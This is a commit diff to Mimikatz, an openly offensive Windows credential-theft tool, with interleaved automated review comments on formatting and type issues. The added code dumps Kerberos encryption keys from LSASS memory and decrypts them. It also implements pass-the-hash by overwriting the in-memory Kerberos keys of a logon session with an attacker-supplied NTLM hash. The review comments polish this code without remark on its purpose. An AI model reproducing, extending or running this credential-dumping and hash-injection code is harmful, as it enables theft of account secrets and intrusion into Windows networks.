Update to Mimikatz commit 5571133a4bc4a9a690cbdcab5f7db6f8ff8bc7e3
This commit is contained in:
parent
940c94e946
commit
e7974b4707
@ -213,7 +213,7 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
|
||||
kull_m_string_args_byName(argc, argv, L"store", &szStore, L"My");
|
||||
|
||||
kprintf(L" * System Store : \'%s\' (0x%08x)\n"
|
||||
L" * Store : \'%s\'\n",
|
||||
L" * Store : \'%s\'\n\n",
|
||||
szSystemStore, dwSystemStore,
|
||||
szStore);
|
||||
|
||||
@ -230,7 +230,7 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
|
||||
{
|
||||
if(CertGetNameString(pCertContext, nameSrc[j], 0, NULL, certName, dwSizeNeeded) == dwSizeNeeded)
|
||||
{
|
||||
kprintf(L"\n%2u. %s\n", i, certName);
|
||||
kprintf(L"%2u. %s\n", i, certName);
|
||||
|
||||
dwSizeNeeded = 0;
|
||||
if(CertGetCertificateContextProperty(pCertContext, CERT_KEY_PROV_INFO_PROP_ID, NULL, &dwSizeNeeded))
|
||||
@ -273,6 +273,8 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
|
||||
} else PRINT_ERROR_AUTO(L"CertGetCertificateContextProperty");
|
||||
}
|
||||
LocalFree(pBuffer);
|
||||
if(!export)
|
||||
kprintf(L"\n");
|
||||
}
|
||||
|
||||
if(export)
|
||||
@ -554,6 +556,7 @@ void kuhl_m_crypto_exportCert(PCCERT_CONTEXT pCertificate, BOOL havePrivateKey,
|
||||
else
|
||||
PRINT_ERROR_AUTO(L"kuhl_m_crypto_generateFileName");
|
||||
}
|
||||
kprintf(L"\n");
|
||||
}
|
||||
|
||||
wchar_t * kuhl_m_crypto_generateFileName(const wchar_t * term0, const wchar_t * term1, const DWORD index, const wchar_t * name, const wchar_t * ext)
|
||||
|
@ -21,6 +21,7 @@ const KUHL_M_C kuhl_m_c_sekurlsa[] = {
|
||||
|
||||
{kuhl_m_sekurlsa_msv_pth, L"pth", L"Pass-the-hash"},
|
||||
{kuhl_m_sekurlsa_kerberos_tickets, L"tickets", L"List Kerberos tickets"},
|
||||
{kuhl_m_sekurlsa_kerberos_keys, L"ekeys", L"List Kerberos Encryption Keys"},
|
||||
{kuhl_m_sekurlsa_dpapi, L"dpapi", L"List Cached MasterKeys"},
|
||||
{kuhl_m_sekurlsa_credman, L"credman", L"List Credentials Manager"},
|
||||
};
|
||||
@ -446,6 +447,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
|
||||
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
|
||||
PKERB_HASHPASSWORD_GENERIC pHashPassword;
|
||||
UNICODE_STRING buffer;
|
||||
PVOID base;
|
||||
DWORD type, i;
|
||||
|
||||
@ -503,6 +506,21 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
}
|
||||
}
|
||||
}
|
||||
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
|
||||
{
|
||||
pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
|
||||
kprintf(L"\t %4i : ", pHashPassword->Type);
|
||||
buffer.Buffer = (PWSTR) pHashPassword->Checksump;
|
||||
buffer.Length = buffer.MaximumLength = (USHORT) ((pHashPassword->Size) ? pHashPassword->Size : LM_NTLM_HASH_LENGTH); // will not use CDLocateCSystem, sorry!
|
||||
if(kull_m_string_getUnicodeString(&buffer, cLsass.hLsassMem))
|
||||
{
|
||||
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
|
||||
(*lsassLocalHelper->pLsaUnprotectMemory)(buffer.Buffer, buffer.MaximumLength);
|
||||
kull_m_string_wprintf_hex(buffer.Buffer, buffer.Length, 0);
|
||||
LocalFree(buffer.Buffer);
|
||||
}
|
||||
kprintf(L"\n");
|
||||
}
|
||||
else
|
||||
{
|
||||
if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)
|
||||
|
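Review bot: `kprintf(L"\t %4i : ", pHashPassword->Type);` in the new KEY_LIST branch prints `Type` with a signed conversion although the KERB_HASHPASSWORD_GENERIC added by this same commit declares it as DWORD; `%4u` matches the field. Two lines later the `(USHORT)` cast narrows a SIZE_T `Size` into the UNICODE_STRING length fields with no range check, so either a guard for `Size` exceeding 0xFFFF or a comment stating that key sizes are assumed to fit in 16 bits would make that assumption visible. The commented-out fragment `/* && *lsassLocalHelper->pLsaUnprotectMemory*/` inside the `if` condition is dead text and should be removed. The enclosing kuhl_m_sekurlsa_genericCredsOutput starts and ends outside the hunk.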
@ -37,6 +37,7 @@
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST 0x00200000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS 0x00400000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE 0x00800000
|
||||
|
||||
|
@ -55,6 +55,10 @@ const KERB_INFOS kerbHelper[] = {
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, Ticket),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, TicketKvno),
|
||||
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_51),
|
||||
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_KEYS_LIST_5),
|
||||
FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
|
||||
sizeof(KERB_HASHPASSWORD_5),
|
||||
},
|
||||
{
|
||||
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -83,6 +87,10 @@ const KERB_INFOS kerbHelper[] = {
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, Ticket),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, TicketKvno),
|
||||
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_52),
|
||||
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_KEYS_LIST_5),
|
||||
FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
|
||||
sizeof(KERB_HASHPASSWORD_5),
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -111,6 +119,10 @@ const KERB_INFOS kerbHelper[] = {
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Ticket),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketKvno),
|
||||
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_6),
|
||||
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_KEYS_LIST_6),
|
||||
FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
},
|
||||
};
|
||||
|
||||
@ -129,29 +141,156 @@ LONG kuhl_m_sekurlsa_kerberos_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID st
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, NULL);
|
||||
KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_passwords, NULL};
|
||||
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, &data);
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[])
|
||||
{
|
||||
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_tickets, &argc);
|
||||
KIWI_KERBEROS_ENUM_DATA_TICKET ticketData = {argc, FALSE};
|
||||
KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_tickets, &ticketData};
|
||||
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_generic, &data);
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos_keys(int argc, wchar_t * argv[])
|
||||
{
|
||||
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, pOptionalData);
|
||||
KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_keys, NULL};
|
||||
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_generic, &data);
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_generic(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, (PKIWI_KERBEROS_ENUM_DATA) pOptionalData);
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
UNICODE_STRING pinCode;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = { &pinCode, &hLocalMemory }, aLsassMemory = { *(PUNICODE_STRING *)((PBYTE)LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetPin), pData->cLsass->hLsassMem };
|
||||
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0, NULL, NULL);
|
||||
if (aLsassMemory.address)
|
||||
if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)&pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), NULL, NULL);
|
||||
}
|
||||
|
||||
const wchar_t * KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[] = {L"Ticket Granting Service", L"Client Ticket ?", L"Ticket Granting Ticket",};
|
||||
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
PKIWI_KERBEROS_ENUM_DATA_TICKET ticketData = (PKIWI_KERBEROS_ENUM_DATA_TICKET)pOptionalData;
|
||||
DWORD i;
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
for (i = 0; i < 3; i++)
|
||||
{
|
||||
kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
|
||||
kuhl_m_sekurlsa_kerberos_enum_tickets(pData, i, (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetTickets[i], ticketData->isTicketExport);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
DWORD i, nbHash;
|
||||
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = { NULL, Localkerbsession.hMemory }, aLocalHashMemory = { NULL, Localkerbsession.hMemory };
|
||||
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
kprintf(L"\n\tKey List @ %p\n", RemoteLocalKerbSession.address);
|
||||
if (aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if (nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
|
||||
{
|
||||
RemoteLocalKerbSession.address = (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
|
||||
i = nbHash * (DWORD)kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
|
||||
if (aLocalHashMemory.address = LocalAlloc(LPTR, i))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
|
||||
for (i = 0; i < nbHash; i++)
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), NULL, NULL);
|
||||
LocalFree(aLocalHashMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalKeyMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
PMSV1_0_PTH_DATA pthData = (PMSV1_0_PTH_DATA)pOptionalData;
|
||||
DWORD i, nbHash;
|
||||
BYTE ntlmHash[LM_NTLM_HASH_LENGTH];
|
||||
UNICODE_STRING nullPasswd = { 0, 0, NULL };
|
||||
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = { NULL, Localkerbsession.hMemory }, aLocalHashMemory = { NULL, Localkerbsession.hMemory }, aLocalNTLMMemory = { ntlmHash, Localkerbsession.hMemory }, aLocalPasswdMemory = { &nullPasswd, Localkerbsession.hMemory }, aRemotePasswdMemory = { (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory };
|
||||
PKERB_HASHPASSWORD_GENERIC pHash;
|
||||
|
||||
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||
{
|
||||
if (aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if (nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
|
||||
{
|
||||
RemoteLocalKerbSession.address = (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
|
||||
i = nbHash * (DWORD)kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
|
||||
if (aLocalHashMemory.address = LocalAlloc(LPTR, i))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
|
||||
{
|
||||
kprintf(L"Data copy Kerberos @ %p (%u hash) :", RemoteLocalKerbSession.address, nbHash);
|
||||
for (i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
|
||||
{
|
||||
kprintf(L" ");
|
||||
pHash = (PKERB_HASHPASSWORD_GENERIC)((PBYTE)aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric);
|
||||
RemoteLocalKerbSession.address = pHash->Checksump;
|
||||
RtlCopyMemory(aLocalNTLMMemory.address, pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
if (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA)
|
||||
(*pData->lsassLocalHelper->pLsaProtectMemory)(aLocalNTLMMemory.address, LM_NTLM_HASH_LENGTH);
|
||||
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, pHash->Size ? (min(pHash->Size, LM_NTLM_HASH_LENGTH)) : LM_NTLM_HASH_LENGTH)) // ok not fair-play with AES-* and old CRC =)
|
||||
kprintf(L"%u", i + 1);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
}
|
||||
if (pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
|
||||
{
|
||||
kprintf(L" ");
|
||||
if (pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, sizeof(UNICODE_STRING)))
|
||||
kprintf(L"OK!", aRemotePasswdMemory.address);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalHashMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalKeyMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
PMSV1_0_PTH_DATA pthData = (PMSV1_0_PTH_DATA)pOptionalData;
|
||||
KIWI_KERBEROS_ENUM_DATA data = { kuhl_m_sekurlsa_enum_kerberos_callback_pth, pthData };
|
||||
if (RtlEqualLuid(pData->LogonId, pthData->LogonId))
|
||||
{
|
||||
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, &data);
|
||||
return FALSE;
|
||||
}
|
||||
else return TRUE;
|
||||
}
|
||||
|
||||
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKIWI_KERBEROS_ENUM_DATA pEnumData)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = { NULL, &hLocalMemory }, aLsassMemory = { NULL, pData->cLsass->hLsassMem };
|
||||
UNICODE_STRING pinCode;
|
||||
DWORD i;
|
||||
|
||||
if (kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex))
|
||||
{
|
||||
aLsassMemory.address = KerbLogonSessionListOrTable;
|
||||
@ -165,29 +304,7 @@ void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGO
|
||||
if (aLocalMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structSize))
|
||||
{
|
||||
if (pOptionalData) // ticket mode
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
|
||||
for (i = 0; i < 3; i++)
|
||||
{
|
||||
kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
|
||||
kuhl_m_sekurlsa_kerberos_enum_tickets(pData, i, (PBYTE)aLsassMemory.address + kerbHelper[KerbOffsetIndex].offsetTickets[i], *(int *)pOptionalData);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
else // password mode
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0, NULL, NULL);
|
||||
if (aLsassMemory.address = (*(PUNICODE_STRING *)((PBYTE)aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetPin)))
|
||||
{
|
||||
aLocalMemory.address = &pinCode;
|
||||
if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)&pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), NULL, NULL);
|
||||
}
|
||||
}
|
||||
}
|
||||
pEnumData->callback(pData, aLocalMemory, aLsassMemory, pEnumData->optionalData);
|
||||
LocalFree(aLocalMemory.address);
|
||||
}
|
||||
}
|
||||
|
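Review bot: In kuhl_m_sekurlsa_enum_kerberos_callback_pth, `kprintf(L"OK!", aRemotePasswdMemory.address);` passes an argument that the format string never consumes; `kprintf(L"OK!");` is what the line actually prints. Both kuhl_m_sekurlsa_enum_kerberos_callback_keys and callback_pth read the entry count as `((DWORD *)(aLocalKeyMemory.address))[1]`, a bare index that hides the meaning; the KIWI_KERBEROS_KEYS_LIST_5 and _6 layouts added in this commit share the `unk0`/`cbItem` prefix, so `((PKIWI_KERBEROS_KEYS_LIST_5)aLocalKeyMemory.address)->cbItem` reads the same word and names it. The same two functions reuse `i` first as the byte count handed to LocalAlloc and then as the loop index, which is easy to misread; a separate local such as `cbHashes` would keep the two roles apart. In kuhl_m_sekurlsa_kerberos_tickets, `KIWI_KERBEROS_ENUM_DATA_TICKET ticketData = {argc, FALSE};` stores an int count in a BOOL field; writing `{argc != 0, FALSE}` with a comment that a non-empty argument list appears to select export states the intent the replaced `*(int *)pOptionalData` relied on.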
@ -6,18 +6,37 @@
|
||||
#pragma once
|
||||
#include "../kuhl_m_sekurlsa.h"
|
||||
#include "../../kerberos/khul_m_kerberos_ticket.h"
|
||||
#include "../modules/kull_m_crypto_system.h"
|
||||
#include "../modules/kull_m_file.h"
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package;
|
||||
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_KERBEROS_CRED_CALLBACK) (IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
typedef struct _KIWI_KERBEROS_ENUM_DATA {
|
||||
PKUHL_M_SEKURLSA_KERBEROS_CRED_CALLBACK callback;
|
||||
PVOID optionalData;
|
||||
} KIWI_KERBEROS_ENUM_DATA, *PKIWI_KERBEROS_ENUM_DATA;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos_keys(int argc, wchar_t * argv[]);
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_generic(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKIWI_KERBEROS_ENUM_DATA pEnumData);
|
||||
|
||||
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile);
|
||||
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
wchar_t * kuhl_m_sekurlsa_kerberos_generateFileName(PLUID LogonId, const DWORD grp, const DWORD index, PKIWI_KERBEROS_TICKET ticket, LPCWSTR ext);
|
||||
|
||||
PKIWI_KERBEROS_TICKET kuhl_m_sekurlsa_kerberos_createTicket(PBYTE pTicket, PKULL_M_MEMORY_HANDLE hLSASS);
|
||||
@ -52,6 +71,10 @@ typedef struct _KERB_INFOS
|
||||
LONG offsetTicket;
|
||||
LONG offsetTicketKvno;
|
||||
SIZE_T structTicketSize;
|
||||
LONG offsetKeyList;
|
||||
SIZE_T structKeyListSize;
|
||||
LONG offsetHashGeneric;
|
||||
SIZE_T structKeyPasswordHashSize;
|
||||
} KERB_INFOS, *PKERB_INFOS;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_LOGON_SESSION_51
|
||||
